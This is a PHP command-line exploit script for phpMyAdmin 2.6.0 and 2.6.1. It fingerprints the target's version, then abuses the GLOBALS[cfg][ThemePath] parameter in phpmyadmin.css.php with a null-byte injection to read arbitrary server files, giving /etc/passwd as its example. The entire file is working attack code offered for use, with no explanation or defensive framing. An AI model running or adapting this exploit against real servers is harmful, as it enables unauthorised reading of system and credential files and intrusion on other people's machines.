#!/usr/bin/php -q
<?
/*
 * phpMyAdmin 2.6.0 & 2.6.1 xpl 
 *
 * !dSR - www.digitalsec.net
 *  
 */

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if (isset($argv[2])){
    $url = $argv[1];
    $file = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <file> [proxy]\n\n";
    echo "\tURL\t URL to phpMyAdmin site (ex: http://127.0.0.1/phpMyAdmin)\n";
    echo "\tfile\t the file to read  (ex: '/etc/passwd')\n";
    echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n"; 
    exit;
}
if (isset($argv[3]))
    $proxy = $argv[3];


/* Check version */
$tmp = file ($url."/main.php");
foreach ($tmp as $r_key => $line) {
	if (preg_match ("/Welcome to\s*phpMyAdmin\s*(\d+\.\d+\.\d+)-pl(\d+)/", $line, $regs)) {
		$version =  $regs[1];
		$rel = $regs[2];
	}
}

if ($version == "2.6.0") {
	$attack = "/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=".$file."%00&theme=";
}
if ($version == "2.6.1") {
	$attack = "/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=".dirname($file)."&theme=".$file."%00&js_frame=left";
}

$ch = curl_init ();

if (isset($proxy)) {
	curl_setopt($ch, CURLOPT_PROXY, $proxy);
}

curl_setopt($ch, CURLOPT_URL, $url.$attack);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$res = curl_exec ($ch);
curl_close($ch);
$tmp = split ("\n", $res);
foreach ($tmp as $r_key => $line) {
	if (preg_match ("/\/\* Calendar \*\//", $line)) {
		exit;
	}
	print "$line\n";
}
?>